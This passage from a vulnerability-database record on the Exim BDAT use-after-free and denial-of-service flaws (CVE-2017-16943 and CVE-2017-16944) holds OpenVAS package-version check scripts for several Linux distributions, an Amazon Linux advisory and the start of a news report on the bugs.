any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704053\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2017-16943\", \"CVE-2017-16944\");\n script_name(\"Debian Security Advisory DSA 4053-1 (exim4 - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-11-30 00:00:00 +0100 (Thu, 30 Nov 2017)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2017/dsa-4053.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n script_tag(name:\"affected\", value:\"exim4 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), these problems have been fixed in\nversion 4.89-2+deb9u2. 
Default installations disable advertising the\nESMTP CHUNKING extension and are not affected by these issues.\n\nWe recommend that you upgrade your exim4 packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/exim4\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities have been discovered in Exim, a mail transport\nagent. The Common Vulnerabilities and Exposures project identifies the\nfollowing issues:\n\nCVE-2017-16943\nA use-after-free vulnerability was discovered in Exim's routines\nresponsible for parsing mail headers. A remote attacker can take\nadvantage of this flaw to cause Exim to crash, resulting in a denial\nof service, or potentially for remote code execution.\n\nCVE-2017-16944\nIt was discovered that Exim does not properly handle BDAT data\nheaders allowing a remote attacker to cause Exim to crash, resulting\nin a denial of service.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"exim4\", ver:\"4.89-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.89-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.89-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.89-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-heavy-dbg\", ver:\"4.89-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.89-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-light-dbg\", ver:\"4.89-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = 
isdpkgvuln(pkg:\"exim4-dbg\", ver:\"4.89-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-dev\", ver:\"4.89-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.89-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:50", "bulletinFamily": "scanner", "description": "Exim is prone to multiple remote code execution vulnerabilities.", "modified": "2018-10-26T00:00:00", "published": "2017-11-27T00:00:00", "id": "OPENVAS:1361412562310140539", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140539", "title": "Exim Multiple RCE Vulnerabilities", "type": "openvas", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_exim_mult_vuln.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Exim Multiple RCE Vulnerabilities\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:exim:exim';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140539\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-11-27 09:50:38 +0700 (Mon, 27 Nov 2017)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2017-16943\", \"CVE-2017-16944\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Exim Multiple RCE Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"SMTP problems\");\n script_dependencies(\"gb_exim_detect.nasl\");\n script_require_ports(\"Services/smtp\", 25);\n script_mandatory_keys(\"exim/installed\");\n\n script_tag(name:\"summary\", value:\"Exim is prone to multiple remote code execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Exim is prone to multiple remote code execution vulnerabilities:\n\n - Use-after-free vulnerability while reading mail header (CVE-2017-16943)\n\n - Exim handles BDAT data incorrectly and leads to crash (CVE-2017-16944)\");\n\n script_tag(name:\"impact\", value:\"A remote attacker may execute arbitrary commands or conduct a denial of\nservice attack.\");\n\n 
script_tag(name:\"affected\", value:\"Exim version 4.88 and 4.89.\");\n\n script_tag(name:\"solution\", value:\"Apply the provided patch or update to version 4.90 or later. As a\nmitigation set 'chunking_advertise_hosts = ' in the Exim configuration.\");\n\n script_xref(name:\"URL\", value:\"https://lists.exim.org/lurker/message/20171125.034842.d1d75cac.en.html\");\n script_xref(name:\"URL\", value:\"https://bugs.exim.org/show_bug.cgi?id=2199\");\n script_xref(name:\"URL\", value:\"https://bugs.exim.org/show_bug.cgi?id=2201\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_in_range(version: version, test_version: \"4.88\", test_version2: \"4.89\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:47", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-12-14T00:00:00", "id": "OPENVAS:1361412562310873907", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873907", "title": "Fedora Update for exim FEDORA-2017-0053bb9719", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_0053bb9719_exim_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for exim FEDORA-2017-0053bb9719\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later 
version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873907\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-14 11:43:09 +0100 (Thu, 14 Dec 2017)\");\n script_cve_id(\"CVE-2017-16944\", \"CVE-2017-16943\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for exim FEDORA-2017-0053bb9719\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'exim'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"exim on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-0053bb9719\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TAGJVKGVJ2IPU7WWYURQ7TGTN7XZT66N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks 
GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"exim\", rpm:\"exim~4.89~7.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:51", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-11-30T00:00:00", "id": "OPENVAS:1361412562310843388", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843388", "title": "Ubuntu Update for exim4 USN-3499-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3499_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for exim4 USN-3499-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843388\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-11-30 07:35:30 +0100 (Thu, 30 Nov 2017)\");\n script_cve_id(\"CVE-2017-16944\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for exim4 USN-3499-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'exim4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that Exim incorrectly\n handled certain BDAT data headers. 
A remote attacker could possibly use this\n issue to cause Exim to crash, resulting in a denial of service.\");\n script_tag(name:\"affected\", value:\"exim4 on Ubuntu 17.10,\n Ubuntu 17.04\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3499-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3499-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(17\\.10|17\\.04)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU17.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.89-5ubuntu1.2\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.89-5ubuntu1.2\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU17.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.88-5ubuntu1.3\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.88-5ubuntu1.3\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:34:51", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", 
"published": "2017-11-28T00:00:00", "id": "OPENVAS:1361412562310843380", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843380", "title": "Ubuntu Update for exim4 USN-3493-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3493_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for exim4 USN-3493-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843380\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-11-28 07:19:15 +0100 (Tue, 28 Nov 2017)\");\n script_cve_id(\"CVE-2017-16943\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for exim4 USN-3493-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for 
the 'exim4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that Exim incorrectly\n handled memory in the ESMTP CHUNKING extension. A remote attacker could use this\n issue to cause Exim to crash, resulting in a denial of service, or possibly\n execute arbitrary code. The default compiler options for affected releases\n should reduce the vulnerability to a denial of service.\");\n script_tag(name:\"affected\", value:\"exim4 on Ubuntu 17.10,\n Ubuntu 17.04\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3493-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3493-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(17\\.10|17\\.04)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU17.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.89-5ubuntu1.1\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.89-5ubuntu1.1\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU17.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.88-5ubuntu1.2\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n 
if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.88-5ubuntu1.2\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:43", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2017-12-07T00:00:00", "id": "OPENVAS:1361412562310851658", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851658", "title": "SuSE Update for exim openSUSE-SU-2017:3220-1 (exim)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2017_3220_1.nasl 12381 2018-11-16 11:16:30Z cfischer $\n#\n# SuSE Update for exim openSUSE-SU-2017:3220-1 (exim)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851658\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-07 07:41:36 +0100 (Thu, 07 Dec 2017)\");\n script_cve_id(\"CVE-2017-16943\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SuSE Update for exim openSUSE-SU-2017:3220-1 (exim)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'exim'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"This update for exim fixes the following issues:\n\n Security issue fixed:\n\n - CVE-2017-16943: Fix possible remote code execution (boo#1069857).\");\n script_tag(name:\"affected\", value:\"exim on openSUSE Leap 42.3, openSUSE Leap 42.2\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2017:3220_1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", 
re:\"ssh/login/release=(openSUSELeap42\\.2|openSUSELeap42\\.3)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"openSUSELeap42.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"exim\", rpm:\"exim~4.86.2~10.9.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"exim-debuginfo\", rpm:\"exim-debuginfo~4.86.2~10.9.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"exim-debugsource\", rpm:\"exim-debugsource~4.86.2~10.9.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"eximon\", rpm:\"eximon~4.86.2~10.9.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"eximon-debuginfo\", rpm:\"eximon-debuginfo~4.86.2~10.9.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"eximstats-html\", rpm:\"eximstats-html~4.86.2~10.9.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"openSUSELeap42.3\")\n{\n\n if ((res = isrpmvuln(pkg:\"exim\", rpm:\"exim~4.86.2~17.1\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"exim-debuginfo\", rpm:\"exim-debuginfo~4.86.2~17.1\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"exim-debugsource\", rpm:\"exim-debugsource~4.86.2~17.1\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"eximon\", rpm:\"eximon~4.86.2~17.1\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n 
}\n\n if ((res = isrpmvuln(pkg:\"eximon-debuginfo\", rpm:\"eximon-debuginfo~4.86.2~17.1\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"eximstats-html\", rpm:\"eximstats-html~4.86.2~17.1\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "amazon": [{"lastseen": "2019-05-29T19:20:27", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nUse-after-free in receive_msg function via vectors involving BDAT commands \nThe receive_msg function in receive.c in the SMTP daemon in Exim 4.88 and 4.89 allows remote attackers to execute arbitrary code or cause a denial of service (use-after-free) via vectors involving BDAT commands. ([CVE-2017-16943 __](<https://access.redhat.com/security/cve/CVE-2017-16943>))\n\nInfinite loop and stack exhaustion in receive_msg function via vectors involving BDAT commands \nThe receive_msg function in receive.c in the SMTP daemon in Exim 4.88 and 4.89 allows remote attackers to cause a denial of service (infinite loop and stack exhaustion) via vectors involving BDAT commands and an improper check for a '.' character signifying the end of the content, related to the bdat_getc function. ([CVE-2017-16944 __](<https://access.redhat.com/security/cve/CVE-2017-16944>))\n\n \n**Affected Packages:** \n\n\nexim\n\n \n**Issue Correction:** \nRun _yum update exim_ to update your system. 
\n\n\n \n\n\n**New Packages:**\n \n \n i686: \n exim-mysql-4.89-4.17.amzn1.i686 \n exim-greylist-4.89-4.17.amzn1.i686 \n exim-debuginfo-4.89-4.17.amzn1.i686 \n exim-pgsql-4.89-4.17.amzn1.i686 \n exim-mon-4.89-4.17.amzn1.i686 \n exim-4.89-4.17.amzn1.i686 \n \n src: \n exim-4.89-4.17.amzn1.src \n \n x86_64: \n exim-debuginfo-4.89-4.17.amzn1.x86_64 \n exim-4.89-4.17.amzn1.x86_64 \n exim-greylist-4.89-4.17.amzn1.x86_64 \n exim-mysql-4.89-4.17.amzn1.x86_64 \n exim-pgsql-4.89-4.17.amzn1.x86_64 \n exim-mon-4.89-4.17.amzn1.x86_64 \n \n \n", "modified": "2017-12-21T22:55:00", "published": "2017-12-21T22:55:00", "id": "ALAS-2017-932", "href": "https://alas.aws.amazon.com/ALAS-2017-932.html", "title": "Critical: exim", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2018-01-27T09:17:26", "bulletinFamily": "info", "description": "[](<https://3.bp.blogspot.com/-abbeag4Q8jw/WhvW6RCqcYI/AAAAAAAAu50/5KDDLazACG42ixs4AotBRc9-c_sJ7G82QCLcBGAs/s1600/exim-hacking.png>)\n\nA security researcher has discovered and publicly disclosed two critical vulnerabilities in the popular Internet mail message transfer agent** Exim**, one of which could allow a remote attacker to execute malicious code on the targeted server. \n \nExim is an open source mail transfer agent (MTA) developed for Unix-like operating systems such as Linux, Mac OSX or Solaris, which is responsible for routing, delivering and receiving email messages. \n \nThe first vulnerability, identified as [CVE-2017-16943](<https://bugs.exim.org/show_bug.cgi?id=2199>), is a use-after-free bug which could be exploited to remotely execute arbitrary code in the SMTP server by crafting a sequence of BDAT commands. \n\n\n> \"To trigger this bug, BDAT command is necessary to perform an allocation by raising an error,\" the researcher said. 
